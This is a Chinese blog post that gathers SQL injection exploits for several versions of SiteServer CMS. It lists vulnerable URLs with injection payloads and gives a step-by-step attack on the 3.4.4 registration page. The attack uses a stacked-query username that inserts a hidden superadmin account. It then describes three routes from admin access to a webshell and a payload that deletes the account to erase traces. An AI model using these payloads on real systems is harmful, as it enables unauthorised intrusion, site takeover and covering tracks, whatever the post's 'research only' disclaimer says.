注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

 
 
 
 
 

日志

 
 

siteserver 各个版本注入收集  

2015-07-06 21:49:50|  分类: CMS |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
siteserver/Upgrade/default.aspx  --查看版本




siteserver 3.6.3版本 SQL注入漏洞
/siteserver/CMS/console_tableMetadata.aspx?ENName=cms_Content&TableType=BackgroundContent
注入点就存在ENName上
http://www.yunsec.net/a/security/bugs/script/2013/1118/12981.html






ver 3.5
.net ver 2.0.207
http://www.wooyun.org/bugs/wooyun-2010-014405

LiveFiles/Pages/Inner/count.aspx?ModuleType=Count&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl08&userName=friends'%20and%20'1'='1





4.0 Beta sql注入漏洞
http://bbs.gexia.com/dialog/forget.aspx?publishmentSystemID=1
找回密码处,用户名存在注入,
http://www.wooyun.org/bugs/wooyun-2014-069586


3.6.4
background_mailSubscribe.aspx页面注入
/siteserver/cms/background_mailSubscribe.aspx?PublishmentSystemID=0&Keyword='%20and%201=@@version%20and%201='1&DateFrom=&DateTo=





---------------------------------------------------------------------------

siteserver3.4.4漏洞

0x01 简介siteserver:

本文测试的版本是:
SiteServer系列产品 最新版本: 3.4.4 正式版 (2011年7月18日发布)
下载地址:http://www.siteserver.cn/download

客户案例:
http://www.siteserver.cn/customer

也百度了一下,发现客户数量还是不少的。

0x02: 漏洞描述:

问题出在UserCenter.Pages.DLL中的Register,注册流程逻辑有问题,具体如下:

1.程序先把用户名带入数据库中查询,如果用户名没有重复,进入第二步;

2.再在远程检测用户名中是否含有非法字符,如果没有,则进入第三步;

3.将新注册的用户插入数据库。

由于在进行第一步的时候,程序没有进行任何处理就带入数据库中查询,那么就可以xxoo了。 orz。。。。

Example:
http://127.0.0.1/UserCenter/register.aspx

用户名填入以下语句,其他地方正常填写。
123′);insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,’VffSUZcBPo4=’,’Encrypted’,’i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,’blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,’blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,’blue’);–

(PS:本人测试的时候在3.4.4下总是不成功

)但是在老版本测试的时候成功了。但是确实是插入成功了的。呵呵)

提交注册之后就往库里面插入了一个用户名为:blue 密码为:lanhai 的超级用户。

默认后台地址为:http://127.0.0.1/siteserver

0x03 后台到webshell:

拿webshell或者直接提权是一个仁者见仁智者见智的活,各家有各家的方法,我大概看了一下,有3种方法

一、

站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx

二、

成员权限-》添加用户-》用户名为:1.asp

http://127.0.0.1/usercenter/

用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell

(ps:后台添加用户时不会验证是否含有非法字符)

三、

系统工具-》实用工具-》机器参数查看
可以看到数据库类型、名称,WEB路径

系统工具-》数据库工具-》SQL语句查询
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。

0x04 扫尾:
xxoo完了之后记得到
http://127.0.0.1/UserCenter/register.aspx
再用
123′);delete bairong_Administrator where UserName=’blue';–
为用户名进行注册,做好痕迹清理工作。

最后,希望siteserver看到之后能及时修补,本文仅作为技术研究之用,请勿用于非法用途。
  评论这张
 
阅读(120)| 评论(0)
推荐

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017